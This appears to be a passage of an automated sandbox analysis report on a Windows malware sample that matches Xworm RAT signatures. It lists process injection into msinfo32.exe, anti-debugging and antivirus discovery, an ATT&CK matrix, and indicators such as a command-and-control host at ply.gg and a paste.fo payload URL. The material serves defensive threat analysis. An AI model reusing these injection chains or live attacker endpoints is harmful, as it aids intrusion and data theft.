            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeMemory allocated: 1AA12860000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeMemory allocated: 1AA2AB30000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeMemory allocated: 204FD6F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeMemory allocated: 204FD9A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeMemory allocated: 27ADEE10000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeMemory allocated: 27AF6F20000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeWindow / User API: threadDelayed 6473Jump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeWindow / User API: threadDelayed 3361Jump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeAPI coverage: 9.7 %
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 2336Thread sleep count: 37 > 30Jump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 2336Thread sleep time: -34126476536362649s >= -30000sJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 344Thread sleep count: 6473 > 30Jump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 344Thread sleep count: 3361 > 30Jump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7164Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 6160Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000002.1721562376.0000025E70A51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT(wd
            Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000002.1721562376.0000025E709EB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000002.1721562376.0000025E70A51000.00000004.00000020.00020000.00000000.sdmp, FRpl.exe, 00000003.00000002.1864510706.000002806A78F000.00000004.00000020.00020000.00000000.sdmp, FRpl.exe, 00000003.00000002.1864510706.000002806A82B000.00000004.00000020.00020000.00000000.sdmp, FRpl.exe, 00000009.00000002.1943889827.00000282C5090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: FRpl.exe, 00000009.00000002.1943889827.00000282C4FE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
            Source: FRpl.exe, 00000003.00000002.1864510706.000002806A82B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf7u
            Source: msinfo32.exe, 00000002.00000002.4156434083.000001AA10E64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD

            Anti Debugging

            barindex
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_3-35241
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_0-35171
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_00298820 RtlAddVectoredExceptionHandler,SetThreadDescription,0_2_00298820
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_00291180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,exit,0_2_00291180
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002EA560 SetUnhandledExceptionFilter,0_2_002EA560
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002D2E10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_002D2E10
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B68820 RtlAddVectoredExceptionHandler,SetThreadDescription,3_2_00B68820
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B61180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,exit,3_2_00B61180
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00BBA560 SetUnhandledExceptionFilter,3_2_00BBA560
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00BA2E10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,3_2_00BA2E10
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeProcess created / APC Queued / Resumed: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeProcess created / APC Queued / Resumed: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeProcess created / APC Queued / Resumed: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 1AA10C70000 protect: page read and writeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 1AA11010000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 204FBB00000 protect: page read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 204FD660000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 27ADD210000 protect: page read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 27ADED60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_00294AA1 LoadLibraryA,LoadLibraryA,CreateProcessA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,memset,InternetOpenA,InternetOpenUrlA,InternetReadFile,memset,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memset,RtlDeleteBoundaryDescriptor,VirtualAllocEx,WriteProcessMemory,QueueUserAPC,ResumeThread,SetLastError,GetModuleFileNameW,GetLastError,GetLastError,CopyFileExW,RegCreateKeyExA,RegSetValueExA,RtlRestoreThreadPreferredUILanguages,RtlDeleteBoundaryDescriptor,GetLastError,GetLastError,0_2_00294AA1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_00294AA1 LoadLibraryA,LoadLibraryA,CreateProcessA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,memset,InternetOpenA,InternetOpenUrlA,InternetReadFile,memset,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memset,RtlDeleteBoundaryDescriptor,VirtualAllocEx,WriteProcessMemory,QueueUserAPC,ResumeThread,SetLastError,GetModuleFileNameW,GetLastError,GetLastError,CopyFileExW,RegCreateKeyExA,RegSetValueExA,RtlRestoreThreadPreferredUILanguages,RtlDeleteBoundaryDescriptor,GetLastError,GetLastError,0_2_00294AA1
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B64AA1 LoadLibraryA,LoadLibraryA,CreateProcessA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,memset,InternetOpenA,InternetOpenUrlA,InternetReadFile,memset,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memset,RtlDeleteBoundaryDescriptor,VirtualAllocEx,WriteProcessMemory,QueueUserAPC,ResumeThread,SetLastError,GetModuleFileNameW,GetLastError,GetLastError,CopyFileExW,RtlRestoreThreadPreferredUILanguages,RtlDeleteBoundaryDescriptor,GetLastError,GetLastError,3_2_00B64AA1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeThread created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe EIP: 216804F0Jump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeThread created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe EIP: 216804F0Jump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeThread created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe EIP: 216804F0Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeThread APC queued: target process: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeMemory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 1AA10C70000Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeMemory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 7FFE0C5B38C0Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeMemory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 7FFE221BF1F0Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeMemory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 1AA11010000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeMemory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 204FBB00000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeMemory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 7FFE0C5B38C0Jump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeMemory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 7FFE221BF1F0Jump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeMemory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 204FD660000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeMemory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 27ADD210000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeMemory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 7FFE0C5B38C0Jump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeMemory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 7FFE221BF1F0Jump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeMemory written: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe base: 27ADED60000Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeProcess created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeProcess created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeProcess created: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"Jump to behavior
            Source: msinfo32.exe, 00000002.00000002.4156949853.000001AA12E3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: msinfo32.exe, 00000002.00000002.4156949853.000001AA12E3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: msinfo32.exe, 00000002.00000002.4156949853.000001AA12E3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: msinfo32.exe, 00000002.00000002.4156949853.000001AA12E3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
            Source: msinfo32.exe, 00000002.00000002.4156949853.000001AA12E3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2b
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002D45F0 cpuid 0_2_002D45F0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002D2D30 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_002D2D30
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: msinfo32.exe, 00000002.00000002.4156434083.000001AA10DF0000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000002.00000002.4156434083.000001AA10DF7000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000002.00000002.4157386528.000001AA2B1F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 11.2.msinfo32.exe.27adee40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.msinfo32.exe.1aa12890000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.msinfo32.exe.27adef2d008.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.msinfo32.exe.204fd720000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.msinfo32.exe.2048000d008.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.1976262296.0000027ADEE40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1897725884.00000204FD720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.1976311824.0000027ADEF21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4156799723.000001AA12890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1896700546.0000020480001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msinfo32.exe PID: 7012, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: msinfo32.exe PID: 6888, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: msinfo32.exe PID: 908, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 11.2.msinfo32.exe.27adee40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.msinfo32.exe.1aa12890000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.msinfo32.exe.27adef2d008.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.msinfo32.exe.204fd720000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.msinfo32.exe.2048000d008.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.1976262296.0000027ADEE40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1897725884.00000204FD720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.1976311824.0000027ADEF21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4156799723.000001AA12890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1896700546.0000020480001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msinfo32.exe PID: 7012, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: msinfo32.exe PID: 6888, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: msinfo32.exe PID: 908, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation
            1
            Registry Run Keys / Startup Folder
            712
            Process Injection
            1
            Masquerading
            OS Credential Dumping1
            System Time Discovery
            Remote Services11
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading
            1
            Registry Run Keys / Startup Folder
            1
            Disable or Modify Tools
            LSASS Memory321
            Security Software Discovery
            Remote Desktop ProtocolData from Removable Media1
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            231
            Virtualization/Sandbox Evasion
            Security Account Manager231
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive2
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook712
            Process Injection
            NTDS2
            Process Discovery
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Deobfuscate/Decode Files or Information
            LSA Secrets1
            Application Window Discovery
            SSHKeylogging13
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
            Obfuscated Files or Information
            Cached Domain Credentials14
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Software Packing
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1489770 Sample: SecuriteInfo.com.Heur.Mint.... Startdate: 08/08/2024 Architecture: WINDOWS Score: 100 35 cameras-commitment.gl.at.ply.gg 2->35 37 paste.fo 2->37 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 7 other signatures 2->47 7 SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe 1 16 2->7         started        12 FRpl.exe 13 2->12         started        14 FRpl.exe 13 2->14         started        signatures3 process4 dnsIp5 39 paste.fo 104.21.28.76, 443, 49730, 49732 CLOUDFLARENETUS United States 7->39 29 C:\Users\user\AppData\Roaming\...\FRpl.exe, PE32+ 7->29 dropped 31 C:\Users\user\...\FRpl.exe:Zone.Identifier, ASCII 7->31 dropped 49 Early bird code injection technique detected 7->49 51 Found API chain indicative of debugger detection 7->51 53 Contains functionality to inject threads in other processes 7->53 63 2 other signatures 7->63 16 msinfo32.exe 2 7->16         started        19 conhost.exe 7->19         started        55 Multi AV Scanner detection for dropped file 12->55 57 Writes to foreign memory regions 12->57 59 Allocates memory in foreign processes 12->59 21 msinfo32.exe 1 12->21         started        23 conhost.exe 12->23         started        61 Creates a thread in another existing process (thread injection) 14->61 25 msinfo32.exe 14->25         started        27 conhost.exe 14->27         started        file6 signatures7 process8 dnsIp9 33 cameras-commitment.gl.at.ply.gg 147.185.221.16, 20343, 49731, 49740 SALSGIVERUS United States 16->33

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe25%VirustotalBrowse
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe25%VirustotalBrowse
            No Antivirus matches
            SourceDetectionScannerLabelLink
            paste.fo0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://docs.rs/getrandom#nodejs-es-module-support/rustc/64ebd39da5ec28caa3bd7cbb3f22f5949432fe2b0%VirustotalBrowse
            cameras-commitment.gl.at.ply.gg0%Avira URL Cloudsafe
            https://paste.fo/raw/9c15a0ff5499j~0%Avira URL Cloudsafe
            https://docs.rs/getrandom#nodejs-es-module-support/rustc/64ebd39da5ec28caa3bd7cbb3f22f5949432fe2b0%Avira URL Cloudsafe
            https://paste.fo/raw/9c15a0ff5499e0%Avira URL Cloudsafe
